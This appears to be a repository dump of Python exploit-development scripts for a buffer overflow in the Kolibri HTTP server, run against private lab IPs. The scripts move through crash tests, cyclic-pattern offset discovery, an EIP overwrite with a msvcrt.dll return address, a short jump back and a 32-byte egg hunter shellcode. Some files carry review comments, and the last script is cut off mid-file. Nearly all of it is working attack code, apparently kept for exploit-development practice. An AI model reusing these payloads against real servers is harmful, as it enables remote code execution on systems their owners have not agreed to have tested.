time/kol4.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | Stage1 = "A"*515 + "\x59\x54\xC3\x77" + "\xEB\xC4" 8 | 9 | buffer = ( 10 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 11 | "Host: 192.168.201.140:8080\r\n" 12 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" 13 | "Keep-Alive: 115\r\n" 14 | "Connection: keep-alive\r\n\r\n") 15 | 16 | exp1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 17 | exp1.connect(("192.168.201.140", 8080)) 18 | exp1.send(buffer) 19 | exp1.close() 20 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/1st time/kol5.py: 
-------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | hunter = ( 8 | "\x66\x81\xca\xff" 9 | "\x0f\x42\x52\x6a" 10 | "\x02\x58\xcd\x2e" 11 | "\x3c\x05\x5a\x74" 12 | "\xef\xb8\x62\x33" #b3 13 | "\x33\x66\x8b\xfa" #3f 14 | "\xaf\x75\xea\xaf" 15 | "\x75\xe7\xff\xe7" 16 | 17 | Stage1 = "A"*478 + hunter + "A"*5 + "\x59\x54\xC3\x77" + "\xEB\xC4" 18 | 19 | buffer = ( 20 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 21 | "Host: 192.168.201.140:8080\r\n" 22 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" 23 | "Keep-Alive: 115\r\n" 24 | "Connection: keep-alive\r\n\r\n") 25 | 26 | exp1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 27 | exp1.connect(("192.168.201.140", 8080)) 28 | exp1.send(buffer) 29 | exp1.close() 30 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/1st time/kol6.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | hunter = ( 8 | "\x66\x81\xca\xff" 9 | "\x0f\x42\x52\x6a" 10 | "\x02\x58\xcd\x2e" 11 | "\x3c\x05\x5a\x74" 12 | "\xef\xb8\x62\x33" #b3 13 | "\x33\x66\x8b\xfa" #3f 14 | "\xaf\x75\xea\xaf" 15 | "\x75\xe7\xff\xe7") 16 | 17 | Stage1 = "A"*478 + hunter + "A"*5 + "\x59\x54\xC3\x77" + "\xEB\xC4" 18 | Stage2 = 
"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B" 19 | 20 | buffer = ( 21 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 22 | "Host: 192.168.201.140:8080\r\n" 23 | "User-Agent: " + Stage2 + "\r\n" 24 | "Keep-Alive: 115\r\n" 25 | "Connection: keep-alive\r\n\r\n") 26 | 27 | exp1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 28 | exp1.connect(("192.168.201.140", 8080)) 29 | exp1.send(buffer) 30 | exp1.close() 31 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/2nd time/kolibri_crash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | Stage1 = "A"*600 8 | 9 | buffer = ( 10 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 11 | "Host: 172.16.73.129:8080\r\n" 12 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" 13 | "Keep-Alive: 115\r\n" 14 | "Connection: keep-alive\r\n\r\n") 15 | 16 | expl = 
socket.socket(socket.AF_INET, socket.SOCK_STREAM) 17 | expl.connect(("172.16.73.129", 8080)) 18 | expl.send(buffer) 19 | expl.close() -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/2nd time/kolibri_eip_b.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | Stage1 = "A"*515 + "B"*4 8 | 9 | buffer = ( 10 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 11 | "Host: 172.16.73.129:8080\r\n" 12 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" 13 | "Keep-Alive: 115\r\n" 14 | "Connection: keep-alive\r\n\r\n") 15 | 16 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 17 | expl.connect(("172.16.73.129", 8080)) 18 | expl.send(buffer) 19 | expl.close() -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/2nd time/kolibri_eip_crash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | Stage1 = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9" 8 | 9 | buffer = ( 10 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 11 | "Host: 172.16.73.129:8080\r\n" 12 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) 
Gecko/20101026 Firefox/3.6.12\r\n" 13 | "Keep-Alive: 115\r\n" 14 | "Connection: keep-alive\r\n\r\n") 15 | 16 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 17 | expl.connect(("172.16.73.129", 8080)) 18 | expl.send(buffer) 19 | expl.close() -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/2nd time/kolibri_eip_jmp_esp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | Stage1 = "A"*515 + "\x59\x54\xC3\x77" + "B"*2 8 | 9 | buffer = ( 10 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 11 | "Host: 172.16.73.129:8080\r\n" 12 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" 13 | "Keep-Alive: 115\r\n" 14 | "Connection: keep-alive\r\n\r\n") 15 | 16 | expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 17 | expl.connect(("172.16.73.129", 8080)) 18 | expl.send(buffer) 19 | expl.close() 20 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/2nd time/kolibri_eip_jmp_esp_b33f_jmp.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | #Egghunter 8 | #Size 32-bytes 9 | hunter = ( 10 | "\x66\x81\xca\xff" 11 | "\x0f\x42\x52\x6a" 12 | "\x02\x58\xcd\x2e" 13 | "\x3c\x05\x5a\x74" 14 | "\xef\xb8\x62\x33" #b3 15 | "\x33\x66\x8b\xfa" #3f 16 | "\xaf\x75\xea\xaf" 17 | "\x75\xe7\xff\xe7") 18 | 19 | #-------------------------------------------------------------------------------# 20 | # badchars: \x00\x0d\x0a\x3d\x20\x3f # 21 | #-------------------------------------------------------------------------------# 22 | # Stage1: # 23 | # (1) EIP: 0x77C35459 push esp # ret | msvcrt.dll # 24 | # (2) ESP: jump back 60 bytes in the buffer => \xEB\xC4 # 25 | # (3) Enough room 
for egghunter; marker "b33f" #
#-------------------------------------------------------------------------------#

Stage1 = "A"*478 + hunter + "A"*5 + "\x59\x54\xC3\x77" + "\xEB\xC4"


buffer = (
"HEAD /" + Stage1 + " HTTP/1.1\r\n"
"Host: 172.16.73.129:8080\r\n"
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n"
"Keep-Alive: 115\r\n"
"Connection: keep-alive\r\n\r\n")

# NOTE(review): send() may be a partial write (sendall() is not); no timeout is set; the socket is left open if connect() raises.
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(("172.16.73.129", 8080))
expl.send(buffer)
expl.close()

--------------------------------------------------------------------------------
/BoF/Egg Hunter BoF/kolibri-fuzzy-15834/2nd time/kolibri_eip_jmp_esp_jmp_2.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# Jump-back check (2nd attempt series): same 515-byte filler and 4-byte
# address as kolibri_eip_jmp_esp.py, but the trailing 2 bytes are now the
# short jump \xEB\xC4 described in the b33f_jmp script's comment box.

import socket
import os   # unused
import sys  # unused

Stage1 = "A"*515 + "\x59\x54\xC3\x77" + "\xEB\xC4"

buffer = (
"HEAD /" + Stage1 + " HTTP/1.1\r\n"
"Host: 172.16.73.129:8080\r\n"
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n"
"Keep-Alive: 115\r\n"
"Connection: keep-alive\r\n\r\n")

# NOTE(review): send() may be a partial write (sendall() is not); no timeout is set; the socket is left open if connect() raises.
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(("172.16.73.129", 8080))
expl.send(buffer)
expl.close()

--------------------------------------------------------------------------------
/BoF/Egg Hunter BoF/kolibri-fuzzy-15834/3rd time/kol_crash.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# Crash reproduction (3rd attempt series): the HEAD request path is 600 "A" bytes.

import socket
import os   # unused
import sys  # unused

Stage1 = "A"*600

buffer = (
"HEAD /" + Stage1 + " HTTP/1.1\r\n"
# NOTE(review): Host says .130 but connect() below targets 172.16.73.129, and every
# sibling script uses .129 in both places -- looks like a typo; confirm.
"Host: 172.16.73.130:8080\r\n"
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n"
"Keep-Alive: 115\r\n"
"Connection: keep-alive\r\n\r\n") 15 | 16 | exp1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 17 | exp1.connect(("172.16.73.129", 8080)) 18 | exp1.send(buffer) 19 | exp1.close() -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/3rd time/kol_crash_b.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | Stage1 = "A"*515 + "B"*4 8 | 9 | buffer = ( 10 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 11 | "Host: 172.16.73.129:8080\r\n" 12 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" 13 | "Keep-Alive: 115\r\n" 14 | "Connection: keep-alive\r\n\r\n") 15 | 16 | exp1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 17 | exp1.connect(("172.16.73.129", 8080)) 18 | exp1.send(buffer) 19 | exp1.close() 20 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/3rd time/kol_crash_eip.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | Stage1 = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9" 8 | 9 | buffer = ( 10 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 11 | "Host: 172.16.73.129:8080\r\n" 12 | "User-Agent: Mozilla/5.0 
(Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n"
"Keep-Alive: 115\r\n"
"Connection: keep-alive\r\n\r\n")

# NOTE(review): send() may be a partial write (sendall() is not); no timeout is set; the socket is left open if connect() raises.
exp1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
exp1.connect(("172.16.73.129", 8080))
exp1.send(buffer)
exp1.close()

--------------------------------------------------------------------------------
/BoF/Egg Hunter BoF/kolibri-fuzzy-15834/3rd time/kol_crash_eip_jmp_esp.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# Return-address check (3rd attempt series): 515 "A" bytes, the 4 bytes
# \x59\x54\xC3\x77 (0x77C35459 little-endian), then 4 "B" bytes.

import socket
import os   # unused
import sys  # unused

Stage1 = "A"*515 + "\x59\x54\xC3\x77" + "B"*4

buffer = (
"HEAD /" + Stage1 + " HTTP/1.1\r\n"
"Host: 172.16.73.129:8080\r\n"
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n"
"Keep-Alive: 115\r\n"
"Connection: keep-alive\r\n\r\n")

# NOTE(review): send() may be a partial write (sendall() is not); no timeout is set; the socket is left open if connect() raises.
exp1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
exp1.connect(("172.16.73.129", 8080))
exp1.send(buffer)
exp1.close()

--------------------------------------------------------------------------------
/BoF/Egg Hunter BoF/kolibri-fuzzy-15834/3rd time/kol_crash_jmp_back_60.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# Jump-back check (3rd attempt series): same as kol_crash_eip_jmp_esp.py but
# the trailing bytes are the 2-byte short jump \xEB\xC4 instead of "B"s.

import socket
import os   # unused
import sys  # unused

Stage1 = "A"*515 + "\x59\x54\xC3\x77" + "\xEB\xC4"

buffer = (
"HEAD /" + Stage1 + " HTTP/1.1\r\n"
"Host: 172.16.73.129:8080\r\n"
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n"
"Keep-Alive: 115\r\n"
"Connection: keep-alive\r\n\r\n")

# NOTE(review): send() may be a partial write (sendall() is not); no timeout is set; the socket is left open if connect() raises.
exp1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
exp1.connect(("172.16.73.129", 8080))
exp1.send(buffer)
exp1.close()

--------------------------------------------------------------------------------
/BoF/Egg Hunter 
BoF/kolibri-fuzzy-15834/3rd time/kol_hunter_jmp_back_60.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# Hunter placement (3rd attempt series): 478 "A" + 32-byte hunter + 5 "A"
# (= 515, the same offset as the "B"*4 check) + 4-byte address + 2-byte jump.
# The 2nd-series b33f_jmp script carries the author's comment box for this layout.

import socket
import os   # unused
import sys  # unused

hunter = (
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x62\x33\x33\x66\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
)

Stage1 = "A"*478 + hunter + "A"*5 + "\x59\x54\xC3\x77" + "\xEB\xC4"

buffer = (
"HEAD /" + Stage1 + " HTTP/1.1\r\n"
"Host: 172.16.73.129:8080\r\n"
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n"
"Keep-Alive: 115\r\n"
"Connection: keep-alive\r\n\r\n")

# NOTE(review): send() may be a partial write (sendall() is not); no timeout is set; the socket is left open if connect() raises.
exp1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
exp1.connect(("172.16.73.129", 8080))
exp1.send(buffer)
exp1.close()

--------------------------------------------------------------------------------
/BoF/Egg Hunter BoF/kolibri-fuzzy-15834/3rd time/kol_hunter_stage2_pattcreate.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# Second-stage offset discovery (3rd attempt series): Stage1 is the hunter
# layout from kol_hunter_jmp_back_60.py; Stage2 is a 1000-byte cyclic pattern
# (Aa0..Bh2B) carried in the User-Agent header instead of the browser string.

import socket
import os   # unused
import sys  # unused

hunter = (
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x62\x33\x33\x66\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
)

Stage1 = "A"*478 + hunter + "A"*5 + "\x59\x54\xC3\x77" + "\xEB\xC4"
Stage2 = 
"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B" 14 | 15 | buffer = ( 16 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 17 | "Host: 172.16.73.129:8080\r\n" 18 | "User-Agent: " + Stage2 + "\r\n" 19 | "Keep-Alive: 115\r\n" 20 | "Connection: keep-alive\r\n\r\n") 21 | 22 | exp1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 23 | exp1.connect(("172.16.73.129", 8080)) 24 | exp1.send(buffer) 25 | exp1.close() 26 | -------------------------------------------------------------------------------- /BoF/Egg Hunter BoF/kolibri-fuzzy-15834/4th time/kol_crash.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket 4 | import os 5 | import sys 6 | 7 | Stage1 = "A"*600 8 | 9 | buffer = ( 10 | "HEAD /" + Stage1 + " HTTP/1.1\r\n" 11 | "Host: 172.16.73.129:8080\r\n" 12 | "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n" 13 | "Keep-Alive: 115\r\n" 14 | "Connection: keep-alive\r\n\r\n") 15 | 16 | expl = 
socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(("172.16.73.129", 8080))
expl.send(buffer)
expl.close()
--------------------------------------------------------------------------------
/BoF/Egg Hunter BoF/kolibri-fuzzy-15834/4th time/kol_crash_eip.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# Offset discovery (4th attempt series): the request path is a 600-byte
# cyclic pattern (Aa0..At9).

import socket
import os   # unused
import sys  # unused

Stage1 = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9"

buffer = (
"HEAD /" + Stage1 + " HTTP/1.1\r\n"
"Host: 172.16.73.129:8080\r\n"
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n"
"Keep-Alive: 115\r\n"
"Connection: keep-alive\r\n\r\n")

# NOTE(review): send() may be a partial write (sendall() is not); no timeout is set; the socket is left open if connect() raises.
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(("172.16.73.129", 8080))
expl.send(buffer)
expl.close()
--------------------------------------------------------------------------------
/BoF/Egg Hunter BoF/kolibri-fuzzy-15834/4th time/kol_crash_eip_b.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# Offset check (4th attempt series): 515 "A" bytes followed by 4 "B" bytes
# in the request path.

import socket
import os   # unused
import sys  # unused

Stage1 = "A"*515 + "B"*4

buffer = (
"HEAD /" + Stage1 + " HTTP/1.1\r\n"
"Host: 172.16.73.129:8080\r\n"
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) 
Gecko/20101026 Firefox/3.6.12\r\n"
"Keep-Alive: 115\r\n"
"Connection: keep-alive\r\n\r\n")

# NOTE(review): send() may be a partial write (sendall() is not); no timeout is set; the socket is left open if connect() raises.
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(("172.16.73.129", 8080))
expl.send(buffer)
expl.close()
--------------------------------------------------------------------------------
/BoF/Egg Hunter BoF/kolibri-fuzzy-15834/4th time/kol_eip_overwrite_jmp_esp.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# Return-address check (4th attempt series): 515 "A" bytes, the 4 bytes
# \x59\x54\xc3\x77 (0x77C35459 little-endian), then 4 "B" bytes.

import socket
import os   # unused
import sys  # unused

Stage1 = "A"*515 + "\x59\x54\xc3\x77" + "B"*4

buffer = (
"HEAD /" + Stage1 + " HTTP/1.1\r\n"
"Host: 172.16.73.129:8080\r\n"
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n"
"Keep-Alive: 115\r\n"
"Connection: keep-alive\r\n\r\n")

# NOTE(review): send() may be a partial write (sendall() is not); no timeout is set; the socket is left open if connect() raises.
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(("172.16.73.129", 8080))
expl.send(buffer)
expl.close()
--------------------------------------------------------------------------------
/BoF/Egg Hunter BoF/kolibri-fuzzy-15834/4th time/kol_hunter.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
# Hunter placement (4th attempt series): 478 "A" + 32-byte hunter + 5 "A"
# (= 515) + 4-byte address + trailing jump bytes.

import socket
import os   # unused
import sys  # unused

hunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x62\x33\x33\x66\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")

# NOTE(review): "xEB\xC4" lacks the backslash the 3rd-series scripts use ("\xEB\xC4");
# as written it is the four bytes x, E, B, 0xC4, not the two-byte jump.
